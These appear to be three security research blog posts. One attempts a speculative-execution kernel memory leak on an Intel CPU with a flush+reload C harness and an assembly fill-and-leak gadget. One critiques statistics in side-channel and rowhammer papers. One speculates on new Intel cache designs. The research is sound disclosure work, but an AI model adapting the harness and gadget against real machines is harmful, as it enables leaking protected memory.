The pipeline starts with the instruction decoder. The instruction decoder reads bytes from memory, parses the buffer, and outputs instructions, which it then decodes into micro ops. Micro ops are the building blocks of instructions. It is useful to think of x86 CPUs as a Complex Instruction Set Computer (CISC) with a Reduced Instruction Set Computer (RISC) backend. It’s not entirely true, but it’s a useful way to think about it. The micro ops (the reduced instructions) are queued into the reorder buffer. Here micro ops are kept until all their dependencies have been resolved. Each cycle, any micro ops with all dependencies resolved are scheduled on available execution units in first-in, first-out order. With multiple specialized execution units, many micro ops are executing at once, and importantly, due to dependencies and bottlenecks in execution units, micro ops need not execute in the same order as they entered the reorder buffer. When a micro op is finished executing, the result and exception status are added to its entry in the reorder buffer, thus resolving dependencies of other micro ops. When all micro ops belonging to a given instruction have been executed and have made it to the head of the reorder buffer queue, they enter retirement processing. Because the micro ops are at the head of the reorder buffer, we can be sure that retirement happens in the same order in which the micro ops were added to the queue. If an exception was flagged in the reorder buffer for a micro op being retired, an interrupt is raised on the instruction to which the micro op belonged. Thus the interrupt is always raised on the instruction that caused it, even if the micro op that caused the interrupt was executed long before the entire instruction was done. A raised interrupt causes a flush of the pipeline, so that any micro op still in the reorder buffer is discarded and the instruction decoder is reset. If no exception was thrown, the result is committed to the registers. This is essentially an implementation of Tomasulo’s algorithm [1] and allows multiple instructions to execute at the same time while maximizing resource use.

 

Abusing speculative execution

Imagine the following instruction executed in usermode

mov rax,[somekernelmodeaddress]

It will cause an interrupt when retired, but it’s not clear what happens between the instruction finishing execution and the actual retirement. We know that once it retires, any information it may or may not have read is gone, as it will never be committed to the architectural registers. However, maybe we have a chance of seeing what was read if Intel relies perfectly on Tomasulo’s algorithm. Imagine the mov instruction sets its result in the reorder buffer along with the flag that retirement should cause an interrupt and any fetched data should be discarded. If this is the case, we can execute additional code speculatively. Imagine the following code:

mov rax, [Somekerneladdress]

mov rbx, [someusermodeaddress]

If there are no dependencies, both will execute simultaneously (there are two execution units for loads). The second will never get its result committed to the architectural registers, because it will be discarded when the first mov instruction causes an interrupt to be thrown. However, the second instruction also executes speculatively, and it may change the microarchitectural state of the CPU in a way that we can detect. In this particular case, the second mov instruction will load someusermodeaddress into the cache hierarchy, and we will be able to observe a faster access time after structured exception handling has taken care of the exception. To make sure that someusermodeaddress is not already in the cache hierarchy, I can use the clflush instruction before starting the execution. Now only a single further step is required for us to leak information about the kernel memory:

mov rax, [somekerneladdress]

and rax, 1

mov rbx, [rax + someusermodeaddress]

 

If the last two instructions are executed speculatively, the address of the third load differs depending on the value read from somekerneladdress, and thus a different cache line may be loaded into the cache. This cache activity we can observe through a flush+reload cache attack.
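To make that observation concrete, here is a minimal sketch of the flush+reload harness, under a few assumptions of mine: plain C with GCC’s x86 intrinsics, a POSIX SIGSEGV handler standing in for the structured exception handling mentioned above, a hypothetical gadget() function containing the faulting code, and a THRESHOLD that must be calibrated per machine.

#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

#define THRESHOLD 120    /* CLKs; hypothetical value, calibrate per machine */

static sigjmp_buf recover;

static void segv_handler(int sig)
{
    (void)sig;
    siglongjmp(recover, 1);            /* resume after the faulting gadget */
}

/* Returns nonzero if the probe line was touched during speculation. */
static int run_once(volatile uint8_t *probe, void (*gadget)(void))
{
    unsigned int aux;
    signal(SIGSEGV, segv_handler);
    _mm_clflush((const void *)probe);  /* ensure the probe line starts cold */
    _mm_mfence();
    if (sigsetjmp(recover, 1) == 0)
        gadget();                      /* faulting kernel read + dependent load */
    uint64_t t0 = __rdtscp(&aux);
    (void)*probe;                      /* reload the probe line */
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) < THRESHOLD;      /* fast reload => loaded speculatively */
}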

The first problem we’re facing here is that we must make sure the second and third instructions run before the first one retires. We have a race condition we must win. How do we engineer that? We fill the reorder buffer with dependent instructions which use a different execution unit than the ones we need, and then we add the code listed above. The dependency forces the CPU to execute the filling instructions one micro op at a time. Using an execution unit different from the ones used in the leaking code makes sure that the CPU can speculatively execute the leak while still working on the fill pattern.

The straightforward fill pattern I use is 300 times add reg64, imm. I chose add rax, 0x141 because we have two execution units that are able to execute this instruction (the integer ALUs), and since the adds must execute sequentially, one of these units will always be available to my leakage code (provided that another hardware thread in the same core isn’t mixing things up). See the sketch below for how the fill and the leak fit together.
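Here is my reconstruction of the fill-then-leak gadget in GCC extended asm; this is a sketch, not the exact code used, and I scale the leaked bit by a page (the same 4096 offset used in the evaluation below) so the two outcomes hit distinct cache lines.

/* Sketch: 300 dependent adds keep the integer ALUs busy so the two
 * loads at the end can run speculatively before the fill retires.
 * The kernel read faults; a handler (see the harness above) must
 * recover control. */
static inline void fill_and_leak(const void *kernel_addr, const uint8_t *probe_base)
{
    asm volatile(
        ".rept 300\n\t"
        "add $0x141, %%rax\n\t"          /* dependent chain on rax */
        ".endr\n\t"
        "mov (%0), %%rbx\n\t"            /* faulting kernel-mode read */
        "and $1, %%rbx\n\t"              /* keep a single bit */
        "shl $12, %%rbx\n\t"             /* scale by a page -> distinct lines */
        "mov (%1,%%rbx,1), %%rcx\n\t"    /* probe load depends on the bit */
        :
        : "r"(kernel_addr), "r"(probe_base)
        : "rax", "rbx", "rcx", "memory");
}

To read the bit out, one would flush and then time both probe_base[0] and probe_base[4096] and see which reload comes back fast.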

Since my kernel-read mov instruction and my leaking mov instruction must run sequentially, and the data fetched by the leaking instruction cannot be in the cache, the total execution time would be around 400 CLKs if the kernel address isn’t cached. This is a pretty steep cost, given that an add rax, 0x141 costs around 3 CLKs. For this reason, I see to it that the kernel address I’m accessing is loaded into the cache hierarchy. I use two different methods to ensure that. First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1. Gruss et al. [4] concluded that prefetch instructions may load the cache despite not having access rights. Further, they showed that it’s possible for the page table walk to abort, which would surely mean that I’m not getting a result; having the data already in L1 avoids this walk.
 

All said and done, there are a few assumptions I made about Intel’s implementation of Tomasulo’s algorithm:

1)    Speculative execution continues despite interrupt flag

2)    I can win the race condition between speculative execution and retirement

3)    I can load caches during speculative execution

4)    Data is provided despite interrupt flag

 

Evaluation

I ran the following tests on my i3-5005u Broadwell CPU.

I found no way to test assumptions 1, 2, and 3 separately. So I wrote up the code I outlined above, but instead of the leak code above I used the following:

mov rdi, [rdi]        ; where rdi is somekernelmodeaddress

mov rdi, [rdi + rcx]  ; where rcx is someusermodeaddress

Then I timed accessing someusermodeaddress after an exception handler dealt with the resulting exception. I did 1000 runs and sorted the 10 slowest out. First I did a run with the second line above present and the value at the kernel mode address set to 0; then I did a second run with the second line commented out. This allows me to test whether I have a side channel inside the speculative execution. The results are summarized in the histogram below (mean and standard deviation respectively: mean = 71.22, std = 3.31 with the line present; mean = 286.17, std = 53.22 without it). So obviously I have a statistically significant covert channel inside the speculative execution.
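For reference, the mean and standard deviation of such a timing run come from the usual textbook formulas; here is a minimal sketch of the summary step (my own code, numerically naive but fine for a thousand samples; outlier removal happens before calling it):

#include <math.h>
#include <stddef.h>

/* Sample mean and sample standard deviation over n observations. */
static void summarize(const double *x, size_t n, double *mean, double *std)
{
    double s = 0.0, ss = 0.0;
    for (size_t i = 0; i < n; i++) {
        s += x[i];
        ss += x[i] * x[i];
    }
    *mean = s / n;
    *std = sqrt((ss - s * s / n) / (n - 1));  /* n-1: sample std deviation */
}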

 
In a second step I made sure that the kernel address I was trying to read had the value 4096. Now, if I’m actually reading kernel-mode data, the second line will fetch a cache line in the next page, so I would expect a slow access to someusermodeaddress, as the speculative fetch should have accessed a cache line exactly one page further. I selected the offset 4096 to avoid effects due to hardware prefetchers; otherwise I could simply have added the size of a cache line. Unfortunately, I did not get a slow read, suggesting that Intel nulls the result when the access is not allowed. I double-checked by accessing the cache line I wanted to access, and indeed that address had not been loaded into the cache either. Consequently, it seems likely that Intel does process the illegal read of kernel-mode memory, but does not copy the result into the reorder buffer. So at this point my experiment has failed, hence the negative result. Being really curious, I added an add rdi, 4096 instruction after the first line in the test code and could verify that this code was indeed executed speculatively and the result was side-channeled out.

 

Pandora's box

While I did set out to read kernel mode memory without privileges, and that produced a negative result, I do feel like I opened a Pandora’s box. The thing is, there were two positive results in my tests. The first is that Intel’s implementation of Tomasulo’s algorithm is not side channel safe: we have access to the results of speculative execution despite those results never being committed. Secondly, my results demonstrate that speculative execution does indeed continue despite violations of the isolation between kernel mode and user mode.

This is truly bad news for security. First, it gives microarchitectural side channel attacks additional leverage – we can deduce information not only from what is actually executed but also from what is speculatively executed. It also seems likely that we can influence what is speculatively executed through structures like the BTB (see Evtyushkin and Ponomarev [5] for instance). It thus adds another way to increase the expressiveness of microarchitectural side channel attacks, potentially allowing an attacker even more leverage through the CPU. This of course makes writing constant-time code even more complex, which is definitely bad news.

It also draws into doubt mitigations that rely on the retirement of instructions. I cannot say how far that stretches, but my immediate guess would be that vmexits are handled on instruction retirement. Further, we see that speculative execution does not consistently abide by isolation mechanisms, so it is a haunting question what we can actually do with speculative execution.

 

Literature

[1] Intel® 64 and IA-32 Architectures Software Developer Manuals. Intel. https://software.intel.com/en-us/articles/intel-sdm

 

[2] Tomasulo, Robert M. (Jan 1967). “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. IBM Journal of Research and Development. IBM. 11 (1): 25–33. ISSN 0018-8646. doi:10.1147/rd.111.0025.

 

[3] Fogh, Anders. “Covert shotgun: Automatically finding covert channels in SMT”

https://www.youtube.com/watch?v=oVmPQCT5VkY.

 

[4] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.”

Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

 

[5] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR.” In Proceedings of the 49th International Symposium on Microarchitecture (MICRO). 2016.

Statistics and Infosec

 

Introduction

 

The work by John Ioannidis [1], among others, started the “reproduction crisis”. The phrase describes the fact that in many branches of science, researchers have been unable to reproduce classic results which form the basis for our understanding of the world. Since the basic principle of modern science is standing on the shoulders of giants, it is incredibly important that sound methodology is used to ensure that our foundation is solid. For now the reproduction crisis has hardly reached information security, and I hope it will stay that way. But unfortunately the information security scene is full of issues that make it vulnerable to reproduction problems, chief among them methodology and the lack of reproduction studies. A huge number of papers are accepted as true but never reproduced, and many suffer from methodological problems.

 

In this blog post I will argue that among information security papers, very basic statistics could improve the process and reproducibility. Statistics matters as soon as observed data are noisy, and noisy data are everywhere, even in computer science: non-deterministic users, unobserved variables, manufacturing variance, temperature, and other environmental influences all affect our measurements. This of course does not mean that we cannot say anything meaningful about computers – it just means we need to embrace statistics, and so far information security science has not been very successful at that. The purpose of this blog post is to suggest a baby step in the right direction: using sample size, mean, and standard deviation as a means of improving the exposition of noisy data. I intentionally keep the theory short – I encourage everybody to read a real statistics book. Also, with the intention to provoke, I picked two examples of papers where the statistics could have been done better.

 

Statistics, Sample Size, Mean, and Standard Deviation 101

During a lecture, my first statistics professor said that he would automatically flunk any of us who, in the future, reported on noisy data without mentioning three data points about them: the sample size (N), the mean, and the standard deviation. The first reason for bringing these three data points is that they are as close as one gets to a standard in science, accepted in fields ranging from physics through medicine to economics. Having a standard for reporting noisy data allows us to compare studies easily and gives us an easy way to reproduce the findings of other people. Unfortunately, this standard appears not to have arrived in full force in information security yet.

But it is not only about a standard. The thing is: using these three values is not just a historical accident. There is sound theory why we want these three values. Imagine a process generating our data – usually called the data generating process or d.g.p. If the d.g.p. produces observations where the noise is independent of other observations we say the d.g.p. produces independent, identically distributed observations or i.i.d. If observations are not i.i.d. we cannot treat any variation as noise and consequently we need further analysis before we can draw any conclusion based on the data. Hence, i.i.d. is often assumed or considered a good approximation. And very often there are good reasons to do so.

With i.i.d. data, the arithmetic mean of our observations will almost surely converge towards the mean of the d.g.p. as the number of observations increases. This is called the law of large numbers. If one rolls a die a thousand times and gets an arithmetic mean of 3.0, it is an indication that the die is not fair. This explains why we wish to report the arithmetic mean: if the number of samples is sufficiently high, then the arithmetic mean is “close” to the real mean of the data generating process.

Also with i.i.d. data, the central limit theorem almost always applies. The central limit theorem says that we can expect the sample mean to tend towards a normal distribution as the sample size increases. The normal distribution is characterized by only two parameters, its mean and its standard deviation, and it allows us to test hypotheses about the data. The most basic tests can even be made on the back of an envelope. This lets us put a probability on the die in the previous example not being fair – that is, on us not just observing noise.
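As a worked example of such a back-of-envelope test (my own illustration, not from any cited paper): a fair die has mean 3.5 and variance 35/12, so by the central limit theorem an observed mean of 3.0 over 1000 rolls sits roughly 9 standard errors away from fair.

#include <math.h>
#include <stdio.h>

/* Back-of-envelope z-test for the dice example: is a sample mean of
 * 3.0 over 1000 rolls consistent with a fair die? By the central
 * limit theorem the sample mean is approximately normal with
 * standard error sd/sqrt(n). */
int main(void)
{
    double n = 1000.0;
    double mean_fair = 3.5;
    double sd_fair = sqrt(35.0 / 12.0);          /* ~1.708 */
    double observed = 3.0;
    double z = (observed - mean_fair) / (sd_fair / sqrt(n));
    printf("z = %.2f\n", z);                     /* ~ -9.3, far beyond any usual cutoff */
    return 0;
}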

Why we should include the sample size should be pretty obvious by now: both the law of large numbers and the central limit theorem hinge on convergence as the sample size grows. Thus, with a small sample size we are unable to rely on any conclusions. That should not surprise you. Imagine throwing a die 3 times, getting 1, 2, and 4 – you would be a fool to insist that your data show that 6 rarely happens. If you had thrown the die a million times without seeing any 6s, the die almost surely is not fair, and that conclusion would be pertinent.

In most first-semester (or second, if taught with rigor) statistics books, you can find a discussion of estimating how many samples you need, based on the standard deviation estimated from a pilot sample or on prior knowledge of the d.g.p. That, of course, can be turned around to evaluate whether a study had a sufficient sample size – yet another reason why these three numbers are valuable.
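The textbook recipe looks roughly like the sketch below (my paraphrase of the standard formula, not code from any cited source): pick a confidence level, take the pilot standard deviation s, decide on an acceptable confidence interval half-width E, and solve for n.

#include <math.h>

/* Standard sample-size estimate for a mean: n >= (z * s / E)^2,
 * where s is the pilot standard deviation, E the desired confidence
 * interval half-width, and z the normal quantile (1.96 for 95%). */
static double required_samples(double s, double E, double z)
{
    return ceil((z * s / E) * (z * s / E));
}

For example, a pilot standard deviation of 10 and a desired half-width of 2 at 95% confidence gives n = ceil((1.96 * 10 / 2)^2) = 97 observations.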

In short, three small numbers in a 14-page paper can provide deep insight into the soundness of your methodology as well as make your paper easily comparable and reproducible. If you are in doubt, you need to bring these three numbers. One word of caution though: I think these numbers are necessary, but they may not be sufficient to describe the data. Also, you will have no quarrel with me if I can easily calculate the standard deviation from the reported data. For example, reporting the variance instead of the standard deviation, or omitting the standard deviation when reporting on proportions (the Bernoulli distribution is described by its first moment alone), is just fine.

 

Case study 1: A Software Approach to Defeating Side Channels in Last-Level Caches

I will start out with a pretty good paper that could have been better if standard deviation and mean had been mentioned: “A Software Approach to Defeating Side Channels in Last-Level Caches” by Zhou et al. [2]. The authors develop CacheBar, a method to mitigate cache side channel attacks. Against Flush+Reload attacks they use a copy-on-access implementation to avoid sharing memory, which effectively kills Flush+Reload as an attack vector. I shall concentrate on Zhou et al.’s [2] protection against Prime+Probe. For this purpose, Zhou et al. [2] use an overcommitted page coloring scheme. Overcommitted page coloring allows for significantly more flexible memory allocation and thus less performance penalty than the classic page coloring scheme. However, an attacker will remain able to prime a cache set to a certain extent. Consequently, the scheme does not defeat Prime+Probe, but it does add noise. The paper analyzes this noise by first grouping observations of defender demand on a cache set into “none, one, few, some, lots and most” categories. They subsequently train a Bayesian classifier on 500,000 Prime+Probe trials and present the classification result in a custom figure in matrix form. I have no objections thus far; if the authors think that this method of describing the noise provides insights, that is fine with me. I am, however, missing the standard deviation and mean – they do offer the sample size. Why do I think the paper would have been better if they had printed these two values?

  • The categories are arbitrary: To compare the results to other papers with noise (say noisy timers) we would have to categorize in exactly the same fashion.
  • Having reported means we would immediately be able to tell if the noise is biased. Bias would show up in the figures as misprediction but an attacker could adjust for bias.
  • With standard deviation we could calculate on a back of an envelope how many observations an attacker would need to actually successfully exfiltrate the information she is after and thus evaluate if the mitigation will make attacks impractical in different scenarios. For example, you can get lots of observations of encryption, but you cannot ask a user for his password 10000 times.
  • Reproducing a study will, in the presence of noisy data, always show slight differences. When are the black-and-white matrix figures close enough to be considered reproduced? For means and standard deviations that question has long been settled.

That all said, I do not worry about the conclusion of this paper. The sample size is sufficient for the results to hold up and the paper is generally well written. I think this paper is a significant contribution to our knowledge on defending against cache side channel attacks.

 

Case study 2: CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks

Caveat, Apology and More Information

Before I start with my analysis of the statistics in this paper, I should mention that I have given off-the-cuff comments on this paper before, and I generally stand by what I wrote on that occasion. You will find my comments published in Security Week [7]. I did get one thing wrong in my off-the-cuff remarks: I wrote that Brasser et al. [3] draw heavily on Pessl et al. [4]. Brasser et al. do not use the DRAM mapping function from Pessl et al. [4], as I initially thought; instead, they use an ad-hoc specified, approximate mapping function. It is also very important to mention that I am referring to an early version of the paper on arXiv; later revisions may differ, but this does not change the substance of my previous off-the-cuff remarks or of what I write in this blog post. As my critique of the paper is relatively harsh, I emailed the authors ahead of posting the blog post. As of publishing, I have not yet received an answer.

Getting dirty with it

“CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks” by Brasser et al. [3] implements two mitigations for the rowhammer problem: B-Catt and G-Catt. G-Catt uses memory partitioning so that the kernel is not co-located in the same banks as user mode memory, which prevents hammering the kernel space from user mode. I am not convinced that G-Catt cannot be circumvented, but that is not the subject of this blog post. I will instead focus on B-Catt. Kim et al. [5] suggested not using vulnerable memory addresses, and B-Catt implements this idea in a boot loader, rather elegantly using int 15h, subfunction 0xe820, which provides the operating system with a list of memory regions it should avoid using. If the computer is not using any vulnerable addresses, one cannot flip bits with rowhammer and the system is safe. Obviously, not using some of the physical memory comes at a cost for the end user. Kim et al. [5] concluded: “However, the first/second approaches are ineffective when every row in the module is a victim row (Section 6.3)”. In contrast, Brasser et al. [3] conclude: “…we demonstrate that it is an efficient and practical solution that effectively prevents rowhammer attacks as a short-term solution”. So, the big question is who gets it right here. The key issue is how many pages contain bit flips. Kim et al. [5] do not provide numbers on pages, but Brasser et al. do: they evaluate 3 test systems to support their conclusion. “However, our evaluation (Section VI-A2) suggests that only a fraction of rows are vulnerable in practice.”

And this is where my gripe with the statistics in this paper lies. Sometimes you can get away with a tiny sample size – namely, when you have prior evidence that the sample variance is either irrelevant or negligible. Relevance of the variance is given here; prior evidence of a small variance is not. In fact, I will argue quite the contrary below.

But first let me get rid of the terribly loose language of “practical and efficient”. My 15 years of experience as a professional software developer tell me that software needs to work as advertised on at least 99% of the systems; that is, in my opinion, a conservative value. Further, assume that 5% memory overhead is acceptable for B-Catt users. Notice that I defined practical as a fraction of systems that must be running with an acceptable overhead. The alternative would have been defining practical as a maximal acceptable average overhead. I consider the fraction approach the most applicable in most real-world scenarios – it is certainly easier to do back-of-envelope calculations with, which I will be doing for the remainder of this blog post.

Now we can put the sample size of 3 into perspective. Imagine that in reality 10% of systems have more pages with bit flips than is acceptable. With a sample size of 3, that gives us a 72.9% (0.9³) chance that our evaluation will be “suggesting” that we are indeed practical. Being wrong 73% of the time is not a suggestion of being right. We need more data than 3 observations to assume practicality. Obviously, you may argue that my 10% is pulled out of a hat – and it is indeed. It is a conservative number, but not an unrealistic one. The sketch below spells out the arithmetic.
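It is a one-liner really, but for completeness (my own illustration of the back-of-envelope above):

#include <math.h>
#include <stdio.h>

/* If 10% of systems are impractical, what is the chance that all of
 * 3 randomly sampled systems happen to look fine? */
int main(void)
{
    double p_bad = 0.10;
    int n = 3;
    printf("P(all %d samples look fine) = %.3f\n",
           n, pow(1.0 - p_bad, n));    /* 0.9^3 = 0.729 */
    return 0;
}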

This leads us to the question: how much data do we need? The answer depends on the variance in the data, which we do not know. So we can either make an a priori guess based on domain knowledge or take a pilot sample to get an idea. My first-semester statistics book [6] states: “We recommend taking at least 20 observations in a pilot sample” (p. 419). So the authors’ sample does not even qualify as a pilot sample.

So we are left with turning to domain knowledge. Kim et al. [5], in my opinion, have the best available data. They sample 129 modules but do not mention the number of affected pages. They do, however, mention that 3 modules have more than 40% affected rows. On a two-channel Skylake system (to my knowledge the best case) we can have 4 rows per page; assume all bit flips occur such that the smallest number of pages is affected – then we end up with 3 modules out of 129 with at least 10% overhead. Thus no less than 2.3% of modules will have too much overhead, according to my definition, in Kim’s sample. This certainly constitutes a reason for skepticism towards Brasser et al.’s [3] claims.

Kim et al. [5] unfortunately do not calculate a mean or standard deviation – they do report their complete data, so I could calculate them, but instead I will use a bit of brute force to get somewhere. We know that rowhammer is fairly bad, because 6 of the 129 samples have more than 1 million bit flips. Assuming that each cell is equally likely to flip, that gives us a 14.8% probability that a given page is vulnerable, for any of these 6 modules. This assumption has weak support in Kim et al. [5]. Consequently, at least 4.6% of the modules are not practical under my definition and my fairly conservative assumptions. With a finite population of modules (200), the assumption that modules are equally common in the wild, and 129 observations, we can calculate a 95% confidence interval. This confidence interval tells us that between 2.44% and 6.76% of the assumed 200 modules in the population are vulnerable. Obviously, it is not realistic to assume only 200 modules in existence, but if there are more, the confidence interval only gets wider. Thus, under these assumptions, we must dismiss that B-Catt is practical with 95% confidence. It looks like B-Catt is in trouble.
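For transparency, here is how one arrives at that interval: a normal-approximation confidence interval for a proportion with a finite population correction (my own reconstruction; rounding choices explain any last-digit wiggle).

#include <math.h>
#include <stdio.h>

/* 95% confidence interval for the share of impractical modules:
 * point estimate 4.6% from a sample of 129, with a finite population
 * correction for an assumed population of 200 modules. */
int main(void)
{
    double n = 129.0, N = 200.0;
    double p = 0.046;                          /* the 4.6% from the text */
    double se = sqrt(p * (1.0 - p) / n)        /* binomial standard error */
              * sqrt((N - n) / (N - 1.0));     /* finite population correction */
    printf("95%% CI: %.2f%% - %.2f%%\n",
           100.0 * (p - 1.96 * se),
           100.0 * (p + 1.96 * se));           /* 2.44% - 6.76% */
    return 0;
}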

The assumptions above are of course very restrictive, and thus more research is required. What would this research look like? A pilot sample of at least 20 modules would be a good start. Alternatively, we could use my assumptions above to calculate a sample size; doing so, we end up with the number 80.

Obviously, everything here rides on my definitions of practicality and efficiency. My gut feeling is that B-Catt won’t turn out to be practical once we have a reasonable sample. Nevertheless, I would love to see data on the issue. While I think my assumptions are fair for a mainstream product, there might be special cases where B-Catt may shine. For a data center that can shop around for a RAM product with few bit flips, B-Catt may very well be a solution.

 

Literature

[1] Ioannidis, John PA. “Why most published research findings are false.” PLoS Med 2.8 (2005): e124.

[2] Zhou, Ziqiao, Michael K. Reiter, and Yinqian Zhang. “A software approach to defeating side channels in last-level caches.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

[3] Brasser, Ferdinand, et al. “CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks.” arXiv preprint arXiv:1611.08396 (2016).

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM addressing for cross-CPU attacks.” Proceedings of the 25th USENIX Security Symposium. 2016.

[5] Kim, Yoongu, et al. “Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors.” ACM SIGARCH Computer Architecture News. Vol. 42. No. 3. IEEE Press, 2014.

[6] Berry, Donald A., and Bernard William Lindgren. Statistics: Theory and Methods. Duxbury Resource Center.

[7] Kovacs, Eduard. “Researchers Propose Software Mitigations for Rowhammer Attacks.” http://www.securityweek.com/researchers-propose-software-mitigations-rowhammer-attacks

New cache architecture on Intel I9 and Skylake server: An initial assessment

 

Intel has introduced the new I9 CPU, which is seen as an HEDT (High-End DeskTop) product. Its microarchitecture is in many respects shared with the new Skylake server microarchitecture. If history is a guide, technology introduced in this segment slowly trickles down to more budget-friendly desktops. From a microarchitectural point of view, it seems that several things about these CPUs will force changes on microarchitectural attacks – especially in the memory subsystem. In this blog post I’ll give a short overview of some of the relevant changes and the effects they may have on microarchitectural attacks. Since I don’t own or have access to an actual I9 or Skylake server processor, this blog post is just conjecture.

 

Recap of the “old” cache hierarchy

The major change over earlier processors, from a microarchitectural point of view, is that the cache system has received a significant overhaul. Current Intel CPUs have a 3-level cache hierarchy: two very small L1 caches, one for data and one for instructions, and a somewhat larger second-level cache (L2, or Mid Level Cache). L1 data, L1 code, and L2 are part of each core and private to it. Finally, Intel CPUs have had a huge 3rd-level cache (usually called L3, or Last Level Cache) shared between all cores. The L3 cache is subdivided into slices that are logically connected to a core. To share this cache effectively, Intel connected the slices on a ring bus called the Quick Path Interconnect. Further, the L3 was an inclusive cache, which means that anything cached in L1 or L2 must also be cached in L3.

 

Changes

Some of the important changes that have been announced in the Intel Software Optimization Manual [1] are:

–    A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

–    A reduced overall cache size per core (compared to similar older models)

–    A very significant increase in the size of the L2 (a factor of 4)

–    Doubled L2 bandwidth, with only a slight increase in latency

–    The larger L2 is slightly more than offset by a reduction of the shared L3

–    The L3 cache is reorganized as a non-inclusive cache

–    The QPI ring bus is replaced with a mesh-style bus

Why do these changes make sense?

Increasing the size of the L2 at the cost of the L3 makes sense, as the L2 is much faster than the L3 for applications – and one can only assume that shrinking the L3 helps reduce die size and cost. The increase in the size of the L2 caches likewise reduces the marginal utility of the L3. Finally, as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in the L3 is a problem Intel has battled before: with Haswell they introduced Cache Allocation Technology (CAT) to allow software to control L3 cache usage and deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring bus design. There is a penalty for having memory served from another core’s slice, and on a ring bus this penalty is proportional to how far apart the cores are on the ring. With more cores, this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes at a cost, as the same data is loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of (L1 + L2) to L3 size. Previously this ratio has been around 1:10 (depending on the actual CPU), but with the L2 size multiplied by 4 and the L3 made a tiny bit smaller, the ratio is now about 1:1.5. Thus, making the L3 cache non-inclusive is essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive, meaning the contents of L3 cannot be loaded in L1 and L2. I think Intel would have used the well-defined term exclusive if the cache really were exclusive. Thus, it is probably fair to assume that non-inclusive means data may or may not be cached in L1, L2, and L3 at the same time; exactly how this is governed is important, but unfortunately there is no information available on it.

It’s worth noting that many of these changes were tested and developed by Intel for the Knights Landing microarchitecture. Knights Landing is a high-throughput microarchitecture sold in relatively small numbers, so it’s likely that many features developed for it will end up trickling down. It’ll be interesting to see whether Intel brings them to laptops and small desktops or uses different cache designs for different classes of CPUs.

 

Effects

Cache side channel attacks

This new cache layout is likely to have a profound effect on cache side channel attacks. I think Flush+Reload will keep working even with the non-inclusive cache. The flush primitive is based on the CLFlush instruction, which is part of the instruction set architecture (ISA). Intel has been very reluctant to change the ISA in the past, so my estimate is that flushing will work as always. I think the reload primitive will also remain viable: I find it likely that an uncached load will still allocate into the shared L3. It is also likely that the QPI replacement bus can be used to fetch data from private L2 caches, similar to AMD’s cross-CPU transmission. This would give Flush+Reload a flush+transfer flavor, but it would still work; for more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled somehow, we can be fairly certain that at least one of these things is true, if not both – the latter being my guess.

The big changes are likely to be related to the evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can load data into another core’s private hierarchy. Thus, the prime and evict primitives are likely to be ineffective for cross-core attacks. However, both are likely to work decently within a core (hyper-threading, or scheduling on the same core).

While the ISA behavior of CLFlush is almost certain to remain unchanged, the microarchitecture below it will see significant changes. With the QPI ring bus gone, using the Flush+Flush attack by Gruss et al. [3] to find out how many hops on the ring bus you are away from a particular slice almost certainly won’t work. This does not mean that you won’t find a side channel in CLFlush here: buses are typically bandwidth limited and thus an obvious source of congestion – without an inclusive L3, the bus bandwidth might even be easier to saturate. Also, the Flush+Flush attack as a Flush+Reload replacement is likely to show different timing behavior on the new microarchitecture. My upfront guess is that a timing difference, and thus a side channel, remains.

Also affected by the non-inclusiveness of the L3 are row buffer side channel attacks such as those presented by Pessl et al. [4]. Without effective eviction, cross-core attacks may be severely stifled. The ability to reverse engineer the complex DRAM mapping function is likely to remain, though, as it hinges not on eviction but on the ISA behavior of the CLFlush instruction.

With the CLFlush instruction and eviction likely still working within a core, rowhammer will remain effective. But in some scenarios, indirect effects of the microarchitecture changes may break specific attacks, such as that of Bhattacharya and Mukhopadhyay [5]. The reason is that such attacks rely on information leakage through the caches, which becomes more difficult to leverage, as described above.

 

Future

While the changes to the cache make sense given the significant number of cores in the affected systems, it seems unlikely that they will trickle down to notebooks and laptops; with only two cores, the existing cache design seems sensible. Thus we are likely to see two tiers of cache design going forward.

Conclusion

Having a non-inclusive L3 cache is significantly more secure, from a side channel perspective, than an inclusive one in cross-core scenarios. This opens up a defense against these attacks: isolating different security domains on different cores, potentially dynamically. While Flush+Reload is likely to be unaffected, it is also the easiest attack to thwart in real-life scenarios, as avoiding shared memory across security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these microarchitectural changes.

 

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.

[3] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

